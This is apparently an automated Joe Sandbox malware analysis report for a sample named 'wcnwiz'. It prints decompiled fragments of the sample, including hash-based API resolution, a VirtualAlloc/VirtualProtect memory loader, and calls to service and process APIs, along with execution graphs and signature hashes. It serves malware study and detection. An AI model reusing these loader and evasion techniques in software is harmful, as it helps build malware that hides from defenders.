                                                        0x003b3221
                                                        0x003b3223
                                                        0x003b30ba
                                                        0x003b30ba
                                                        0x00000000
                                                        0x003b30ba
                                                        0x003b30ba
                                                        0x003b3218
                                                        0x003b320d
                                                        0x00000000
                                                        0x003b322d
                                                        0x003b322d
                                                        0x003b3242
                                                        0x00000000
                                                        0x003b3242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 003B3299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: ec7f5942c15f5dad40a4b140e815d0efcd6625ab9601f0c9d6328ab82c344162
                                                        • Instruction ID: 5a47a2a9870e1c13882b1d1430f793b657858fcba00e8342627b380f0c479f97
                                                        • Opcode Fuzzy Hash: ec7f5942c15f5dad40a4b140e815d0efcd6625ab9601f0c9d6328ab82c344162
                                                        • Instruction Fuzzy Hash: 2551C371B083218BC719DF6CC4855AA7BEAEBD4308F60491EF651CBB51DB31DA098792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 580 3b7080-3b7092 call 3b34c0 583 3b70af-3b70c3 LoadLibraryW 580->583 584 3b7094-3b70aa call 3b3f00 call 3b3e60 580->584 586 3b70e0-3b70eb 583->586 587 3b70c5-3b70db call 3b3f00 call 3b3e60 583->587 584->583 594 3b7108-3b7110 586->594 595 3b70ed-3b7103 call 3b3f00 call 3b3e60 586->595 587->586 595->594
                                                        C-Code - Quality: 75%
                                                        			E003B7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E003B34C0(__ecx);
                                                        				if( *0x3bdd1c == 0) {
                                                        					 *0x3bdd1c = E003B3E60(__ebx, E003B3F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x3be548; // 0x557de0
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x3be494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E003B3E60(_t15, E003B3F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x3be494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x3bdf30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E003B3E60(_t15, E003B3F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x3bdf30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x003b7080
                                                        0x003b7082
                                                        0x003b7089
                                                        0x003b7092
                                                        0x003b70aa
                                                        0x003b70aa
                                                        0x003b70b0
                                                        0x003b70b2
                                                        0x003b70b8
                                                        0x003b70bc
                                                        0x003b70c3
                                                        0x003b70d6
                                                        0x003b70db
                                                        0x003b70db
                                                        0x003b70e2
                                                        0x003b70e4
                                                        0x003b70eb
                                                        0x003b70fe
                                                        0x003b7103
                                                        0x003b7103
                                                        0x003b7110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003B721D,003B68AC), ref: 003B70B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: }U
                                                        • API String ID: 1029625771-1705064028
                                                        • Opcode ID: e33c9f50ac8581bcb550e598fb3ff0272ccadfbafec1c7ced89e7676ccaff05a
                                                        • Instruction ID: 3c4ed28ea85ad4dc736e129ab193a7980208c4432511886d528ea917ae8e63ff
                                                        • Opcode Fuzzy Hash: e33c9f50ac8581bcb550e598fb3ff0272ccadfbafec1c7ced89e7676ccaff05a
                                                        • Instruction Fuzzy Hash: 1C018F317142200B9B17AF7E98506BA2AAFDBD075CB10052EA215CB615FA30DD018790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 603 3a0580-3a05be call 3a0ed0 606 3a05d2-3a05da 603->606 607 3a05c0-3a05cf 603->607 608 3a05e0-3a05e3 606->608 609 3a06e7-3a06ef 606->609 608->609 610 3a05e9-3a05eb 608->610 610->609 611 3a05f1-3a05fc 610->611 611->609 613 3a0602-3a0607 611->613 614 3a06d8-3a06e4 613->614 615 3a060d-3a0629 call 3a1140 RtlMoveMemory 613->615 618 3a062b-3a0630 615->618 619 3a0654-3a0659 615->619 620 3a0632-3a0641 618->620 621 3a0643-3a0652 618->621 622 3a065b-3a066a 619->622 623 3a066c-3a0678 619->623 624 3a0679-3a0699 call 3a1140 620->624 621->624 622->624 623->624 624->609 627 3a069b-3a06a3 VirtualProtect 624->627 628 3a06c6-3a06d5 627->628 629 3a06a5-3a06a8 627->629 629->609 630 3a06aa-3a06ad 629->630 630->609 631 3a06af-3a06b1 630->631 631->615 632 3a06b7-3a06c3 631->632
                                                        APIs
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003A0F08
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003A0F3E
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003A0F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003A061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 003A069C
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: f6ba8f7cd6fc1d0a971324f60d29a2a670b08c82312b329dc872e209a2f80f52
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: 8C3156B365420157E3299A69DC85BEBB3C4DBE3358F08093AF905D22A0D52ED468C265
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 633 3b5ce0-3b5cec call 3b65e0 636 3b5d09-3b5d0d ExitProcess 633->636 637 3b5cee-3b5d04 call 3b3f00 call 3b3e60 633->637 637->636
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E003B65E0();
                                                        				if( *0x3bddb8 == 0) {
                                                        					 *0x3bddb8 = E003B3E60(_t5, E003B3F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x003b5ce0
                                                        0x003b5cec
                                                        0x003b5d04
                                                        0x003b5d04
                                                        0x003b5d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 003B5D0B
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 54657ed459f4e52bfa1cdb1e7d36819f9ff759a73e6c3db3811afef5f396dfd2
                                                        • Instruction ID: 7f5f917079a67e21479a63cb8b69b399cb79c43584009896e6e48f10b64a2cbd
                                                        • Opcode Fuzzy Hash: 54657ed459f4e52bfa1cdb1e7d36819f9ff759a73e6c3db3811afef5f396dfd2
                                                        • Instruction Fuzzy Hash: AED0C92174421446DA5AABB558567AA259A8FA074CF10411EE251CFA96FE34C910A760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 642 3a0ad0-3a0b31 call 3a0ed0 645 3a0b33-3a0b42 642->645 646 3a0b47-3a0b4d 642->646 647 3a0d40 645->647 648 3a0b5f-3a0b7b 646->648 649 3a0b4f-3a0b54 646->649 651 3a0b7d-3a0b8e 648->651 652 3a0b90 648->652 649->648 653 3a0b96-3a0b9c 651->653 652->653 655 3a0bae-3a0bca 653->655 656 3a0b9e-3a0ba3 653->656 658 3a0bcc-3a0bd4 655->658 659 3a0bd7-3a0c21 VirtualAlloc 655->659 656->655 658->659 663 3a0d1a-3a0d24 659->663 664 3a0c27-3a0c2e 659->664 663->647 665 3a0c30-3a0c3f 664->665 666 3a0c44-3a0c4b 664->666 665->647 667 3a0c5d-3a0c79 666->667 668 3a0c4d-3a0c52 666->668 670 3a0c7b-3a0c83 667->670 671 3a0c86-3a0c8d 667->671 668->667 670->671 672 3a0c9f-3a0cbb 671->672 673 3a0c8f-3a0c94 671->673 675 3a0cc8-3a0cfa VirtualAlloc 672->675 676 3a0cbd-3a0cc5 672->676 673->672 679 3a0d02-3a0d07 675->679 676->675 679->663 680 3a0d09-3a0d18 679->680 680->647
                                                        APIs
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003A0F08
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003A0F3E
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003A0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 003A0BFF
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 95cc0a725d85e6645528a0d8692211dadaa84b61fa9689142e56cc0a8e48efbb
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: 77511370640218ABDB25CF54CE86FEAB7B8EF56701F004195FA08BB190D7B89D85CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003A0F08
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003A0F3E
                                                          • Part of subcall function 003A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003A0F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 003A02F6
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: 71abd8539653be0f187fd6e7e7273be188a708059bd7857cf16f581db62852b3
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: 0C5138B1900268ABDB24EF64DD88BDEB778EF89700F0045D9F509BB250DB745A85CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 6cf10ac20ea3937546dc0497d20ccc28d9de9ee528e7b101cc4ee51b81546126
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 79313D78E511289BCB04DB98CD80AED7BB5FF5C340B508027D502737A4DB789986CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 581a047e9d35ff1edea462f69c8194f0f1771b434f0cd33a9a7cc4a96cb53c1c
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 6E51C5B2A043019BD72ADF26C841B5BB3ECEFD6794F04492EF548E7241E239D914C7A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: 8c3ad75dd7c2e9358d0053cbfff2e6806b43148ccae144175ad46fff2d646fdb
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: 4D4137B66143015FC329DF69CC49BABB3D9EFD6B50F09893EF640DA240D271D90887A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1169
                                                        Total number of Limit Nodes:13

                                                        Graph

                                                        execution_graph 5817 7a0170 5818 7a01fb 5817->5818 5833 7a0ad0 5818->5833 5824 7a02c4 5870 7a06f0 5824->5870 5826 7a02d0 5887 7a08f0 5826->5887 5828 7a02dc 5905 7a0580 5828->5905 5830 7a02e8 5831 7a02ef VirtualFree 5830->5831 5832 7a02fb 5830->5832 5831->5832 5834 7a0b2f 5833->5834 5835 7a0bf0 VirtualAlloc 5834->5835 5836 7a02ab 5834->5836 5837 7a0c1c 5835->5837 5839 7a0d60 5836->5839 5837->5836 5838 7a0cdb VirtualAlloc 5837->5838 5838->5836 5840 7a0d94 5839->5840 5841 7a0da3 VirtualAlloc RtlMoveMemory 5840->5841 5842 7a02b8 5841->5842 5848 7a0ddb 5841->5848 5849 7a0400 GetCurrentProcess 5842->5849 5844 7a0e0d RtlMoveMemory 5844->5848 5845 7a0e3c VirtualAlloc 5845->5848 5846 7a0e6a RtlMoveMemory 5846->5842 5846->5848 5847 7a0e91 RtlFillMemory 5847->5842 5847->5848 5848->5842 5848->5845 5848->5846 5848->5847 5913 7a1140 lstrcpynW 5848->5913 5914 7a1140 lstrcpynW 5849->5914 5851 7a0459 NtQueryInformationProcess 5852 7a046f 5851->5852 5855 7a04c5 5851->5855 5853 7a0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5852->5853 5854 7a0484 GetProcessHeap HeapFree 5852->5854 5857 7a0575 5852->5857 5853->5852 5853->5855 5854->5853 5856 7a04e5 5855->5856 5920 7a1140 lstrcpynW 5855->5920 5915 7a1140 lstrcpynW 5856->5915 5860 7a04dc RtlMoveMemory 5860->5856 5861 7a04ef RtlMoveMemory 5916 7a1140 lstrcpynW 5861->5916 5863 7a0511 RtlMoveMemory 5917 7a1140 lstrcpynW 5863->5917 5865 7a0528 RtlMoveMemory 5918 7a1140 lstrcpynW 5865->5918 5867 7a053f RtlMoveMemory 5919 7a1140 lstrcpynW 5867->5919 5869 7a055a RtlMoveMemory 5869->5824 5871 7a0740 5870->5871 5873 7a0744 5871->5873 5921 7a0fb0 5871->5921 5873->5826 5874 7a0770 5874->5873 5877 7a07ff LoadLibraryA 5874->5877 5929 7a1140 lstrcpynW 5874->5929 5876 7a07b5 RtlMoveMemory 5876->5874 5878 7a08b9 5877->5878 5885 7a080f 5877->5885 5878->5826 5880 7a082d RtlMoveMemory 5880->5874 5880->5885 5881 7a0858 GetProcAddress 5881->5873 5881->5885 5883 7a0872 RtlMoveMemory 5932 7a1140 lstrcpynW 5883->5932 5885->5873 5885->5874 5885->5881 5886 7a0890 RtlMoveMemory 5885->5886 5930 7a1140 lstrcpynW 5885->5930 5931 7a1140 lstrcpynW 5885->5931 5886->5873 5886->5885 5888 7a0934 5887->5888 5889 7a0fb0 2 API calls 5888->5889 5890 7a0938 5888->5890 5891 7a0970 5889->5891 5890->5828 5891->5890 5935 7a1140 lstrcpynW 5891->5935 5893 7a09af RtlMoveMemory 5893->5890 5899 7a09c2 5893->5899 5896 7a09f6 RtlMoveMemory 5896->5899 5897 7a0a97 RtlMoveMemory 5898 7a0aac 5897->5898 5897->5899 5898->5828 5899->5890 5936 7a1140 lstrcpynW 5899->5936 5937 7a1140 lstrcpynW 5899->5937 5939 7a1140 lstrcpynW 5899->5939 5901 7a0a3e RtlMoveMemory 5901->5890 5902 7a0a57 5901->5902 5938 7a1140 lstrcpynW 5902->5938 5904 7a0a61 RtlMoveMemory 5904->5899 5909 7a05bc 5905->5909 5906 7a05c0 5906->5830 5908 7a0617 RtlMoveMemory 5908->5909 5909->5906 5911 7a069b VirtualProtect 5909->5911 5940 7a1140 lstrcpynW 5909->5940 5941 7a1140 lstrcpynW 5909->5941 5911->5909 5912 7a06c6 5911->5912 5912->5830 5913->5844 5914->5851 5915->5861 5916->5863 5917->5865 5918->5867 5919->5869 5920->5860 5922 7a0fda 5921->5922 5923 7a104a 5922->5923 5933 7a1140 lstrcpynW 5922->5933 5923->5874 5925 7a1001 5934 7a1140 lstrcpynW 5925->5934 5927 7a101b RtlMoveMemory 5928 7a1029 5927->5928 5928->5874 5929->5876 5930->5880 5931->5883 5932->5885 5933->5925 5934->5927 5935->5893 5936->5896 5937->5901 5938->5904 5939->5897 5940->5908 5941->5909 5942 7b4b70 5943 7b4b82 5942->5943 5946 7b4b98 5942->5946 5964 7b3f00 GetPEB 5943->5964 5947 7b4bd7 CreateProcessW 5946->5947 5949 7b3f00 GetPEB 5946->5949 5950 7b4c73 5947->5950 5951 7b4bf7 5947->5951 5952 7b4bc6 5949->5952 5953 7b4bff 5951->5953 5955 7b4c33 5951->5955 5957 7b3f00 GetPEB 5951->5957 5954 7b3e60 GetPEB 5952->5954 5956 7b4bd2 5954->5956 5959 7b4c5d 5955->5959 5961 7b3f00 GetPEB 5955->5961 5956->5947 5958 7b4c27 5957->5958 5960 7b3e60 GetPEB 5958->5960 5960->5955 5962 7b4c51 5961->5962 5963 7b3e60 GetPEB 5962->5963 5963->5959 5965 7b3f25 5964->5965 5966 7b3e60 5965->5966 5967 7b3ebc 5966->5967 5968 7b3e9c 5966->5968 5967->5946 5968->5967 5969 7b3f00 GetPEB 5968->5969 5972 7b40f5 5968->5972 5970 7b40e9 5969->5970 5971 7b3e60 GetPEB 5970->5971 5971->5972 5973 7b3f00 GetPEB 5972->5973 5979 7b4126 5972->5979 5974 7b411a 5973->5974 5976 7b3e60 GetPEB 5974->5976 5975 7b3e60 GetPEB 5978 7b4157 5975->5978 5976->5979 5977 7b4138 5977->5946 5978->5946 5979->5975 5979->5977 6905 7b4df0 GetPEB 6951 7b78b0 6961 7b7990 6951->6961 6952 7b7c1e 6955 7b7c3d 6952->6955 6956 7b3f00 GetPEB 6952->6956 6953 7b34c0 GetPEB 6953->6961 6954 7b7c05 6957 7b7c31 6956->6957 6958 7b3e60 GetPEB 6957->6958 6958->6955 6959 7b3f00 GetPEB 6959->6961 6960 7b3e60 GetPEB 6960->6961 6961->6952 6961->6953 6961->6954 6961->6959 6961->6960 6962 7b7fb0 6963 7b34c0 GetPEB 6962->6963 6964 7b7fc2 6963->6964 6965 7b7fe3 6964->6965 6966 7b3f00 GetPEB 6964->6966 6969 7b8029 6965->6969 6970 7b3f00 GetPEB 6965->6970 6967 7b7fd7 6966->6967 6968 7b3e60 GetPEB 6967->6968 6968->6965 6972 7b8051 6969->6972 6974 7b3f00 GetPEB 6969->6974 6971 7b801d 6970->6971 6973 7b3e60 GetPEB 6971->6973 6977 7b807d 6972->6977 6978 7b3f00 GetPEB 6972->6978 6973->6969 6975 7b8045 6974->6975 6976 7b3e60 GetPEB 6975->6976 6976->6972 6979 7b8071 6978->6979 6980 7b3e60 GetPEB 6979->6980 6980->6977 6981 7b64b0 6982 7b64ba 6981->6982 6986 7b64d0 6981->6986 6983 7b3f00 GetPEB 6982->6983 6984 7b64c4 6983->6984 6985 7b3e60 GetPEB 6984->6985 6985->6986 6987 7b42c0 2 API calls 6986->6987 6990 7b659a 6986->6990 6988 7b657b 6987->6988 6988->6990 6991 7b4160 6988->6991 6992 7b4172 6991->6992 6993 7b4180 6991->6993 6994 7b3f00 GetPEB 6992->6994 6993->6990 6995 7b4177 6994->6995 6996 7b3e60 GetPEB 6995->6996 6996->6993 6906 7b4869 6914 7b4870 6906->6914 6907 7b496e 6908 7b492c 6907->6908 6909 7b3f00 GetPEB 6907->6909 6911 7b4981 6909->6911 6910 7b3f00 GetPEB 6910->6914 6912 7b3e60 GetPEB 6911->6912 6912->6908 6913 7b3e60 GetPEB 6913->6914 6914->6907 6914->6908 6914->6910 6914->6913 7003 7b1928 7004 7b191f 7003->7004 7005 7b1bc6 7004->7005 7008 7b1ba4 7004->7008 7009 7b3f00 GetPEB 7004->7009 7020 7b4e30 GetPEB 7004->7020 7023 7b35c0 GetPEB 7004->7023 7024 7b3e60 GetPEB 7004->7024 7006 7b35c0 GetPEB 7005->7006 7007 7b1bd0 7006->7007 7010 7b3f00 GetPEB 7007->7010 7012 7b1bf1 7007->7012 7009->7004 7011 7b1be5 7010->7011 7013 7b3e60 GetPEB 7011->7013 7014 7b1c23 7012->7014 7015 7b3f00 GetPEB 7012->7015 7013->7012 7017 7b1c4b 7014->7017 7019 7b3f00 GetPEB 7014->7019 7016 7b1c17 7015->7016 7018 7b3e60 GetPEB 7016->7018 7018->7014 7021 7b1c3f 7019->7021 7020->7004 7022 7b3e60 GetPEB 7021->7022 7022->7017 7023->7004 7024->7004 5980 7b5ce0 5988 7b65e0 5980->5988 5982 7b5ce5 5983 7b5d09 ExitProcess 5982->5983 5984 7b3f00 GetPEB 5982->5984 5985 7b5cf8 5984->5985 5986 7b3e60 GetPEB 5985->5986 5987 7b5d04 5986->5987 5987->5983 6033 7b65fd 5988->6033 5990 7b3f00 GetPEB 5990->6033 5992 7b706e 6330 7b8740 5992->6330 5994 7b68df 5994->5982 5995 7b6dcd 6305 7bb2e0 5995->6305 5999 7b3f00 GetPEB 6022 7b6927 5999->6022 6000 7b7061 6321 7b8d40 6000->6321 6006 7b7073 6006->5982 6009 7b6f27 GetTickCount 6009->6033 6014 7b7066 6014->5982 6017 7b4220 GetPEB 6017->6033 6018 7b3e60 GetPEB 6018->6022 6022->5999 6022->6009 6022->6018 6027 7b6975 GetTickCount 6022->6027 6026 7b3e60 GetPEB 6026->6033 6027->6033 6032 7b4160 GetPEB 6032->6033 6033->5990 6033->5992 6033->5994 6033->5995 6033->6000 6033->6017 6033->6022 6033->6026 6033->6032 6034 7b8400 6033->6034 6040 7b7120 6033->6040 6061 7b8e80 6033->6061 6071 7b8970 6033->6071 6083 7b80a0 6033->6083 6095 7b9860 6033->6095 6111 7b9620 6033->6111 6120 7b12b0 6033->6120 6142 7bafe0 6033->6142 6147 7b8700 6033->6147 6153 7b6060 6033->6153 6174 7bb430 6033->6174 6181 7b9f30 6033->6181 6190 7b61e0 6033->6190 6202 7b94d0 6033->6202 6209 7b3310 6033->6209 6219 7b1840 6033->6219 6234 7b3460 6033->6234 6244 7b53d0 6033->6244 6249 7b9270 6033->6249 6259 7b8bb0 6033->6259 6269 7b72d0 6033->6269 6279 7b9050 6033->6279 6293 7b4770 6033->6293 6310 7bb1d0 6033->6310 6315 7b7410 6033->6315 6038 7b84e3 6034->6038 6035 7b8600 CreateFileW 6037 7b85bd 6035->6037 6035->6038 6036 7b3f00 GetPEB 6036->6038 6037->6033 6038->6035 6038->6036 6038->6037 6039 7b3e60 GetPEB 6038->6039 6039->6038 6044 7b7125 6040->6044 6041 7b7233 6348 7b34c0 6041->6348 6043 7b7232 6043->6033 6044->6041 6044->6043 6050 7b7080 GetPEB LoadLibraryW 6044->6050 6046 7b7265 LoadLibraryW 6047 7b727a 6046->6047 6048 7b7290 6046->6048 6051 7b3f00 GetPEB 6047->6051 6057 7b3f00 GetPEB 6048->6057 6058 7b72b8 6048->6058 6049 7b3f00 GetPEB 6052 7b7254 6049->6052 6050->6044 6053 7b7284 6051->6053 6054 7b3e60 GetPEB 6052->6054 6055 7b3e60 GetPEB 6053->6055 6056 7b7260 6054->6056 6055->6048 6056->6046 6059 7b72ac 6057->6059 6058->6033 6060 7b3e60 GetPEB 6059->6060 6060->6058 6066 7b8ea0 6061->6066 6062 7b8ff2 OpenServiceW 6062->6066 6063 7b901b 6064 7b3f00 GetPEB 6063->6064 6070 7b8fc6 6063->6070 6068 7b902e 6064->6068 6065 7b3e60 GetPEB 6065->6066 6066->6062 6066->6063 6066->6065 6067 7b3f00 GetPEB 6066->6067 6066->6070 6067->6066 6069 7b3e60 GetPEB 6068->6069 6069->6070 6070->6033 6081 7b8991 6071->6081 6072 7b3f00 GetPEB 6072->6081 6073 7b34c0 GetPEB 6073->6081 6074 7b8b74 6076 7b8add 6074->6076 6077 7b3f00 GetPEB 6074->6077 6076->6033 6078 7b8b87 6077->6078 6080 7b3e60 GetPEB 6078->6080 6079 7b3e60 GetPEB 6079->6081 6080->6076 6081->6072 6081->6073 6081->6074 6081->6076 6081->6079 6082 7b3460 GetPEB 6081->6082 6358 7b5040 6081->6358 6082->6081 6094 7b8163 6083->6094 6084 7b34c0 GetPEB 6084->6094 6085 7b8397 CreateFileW 6086 7b83e6 6085->6086 6085->6094 6086->6033 6087 7b83c7 6087->6086 6089 7b3f00 GetPEB 6087->6089 6088 7b8358 6088->6033 6090 7b83da 6089->6090 6092 7b3e60 GetPEB 6090->6092 6091 7b3e60 GetPEB 6091->6094 6092->6086 6093 7b3f00 GetPEB 6093->6094 6094->6084 6094->6085 6094->6087 6094->6088 6094->6091 6094->6093 6110 7b9880 6095->6110 6096 7b9b02 6098 7b9b26 SHGetFolderPathW 6096->6098 6102 7b3f00 GetPEB 6096->6102 6097 7b99b2 OpenSCManagerW 6097->6110 6384 7b3040 6098->6384 6099 7b3f00 GetPEB 6099->6110 6101 7b9969 SHGetFolderPathW 6101->6110 6105 7b9b15 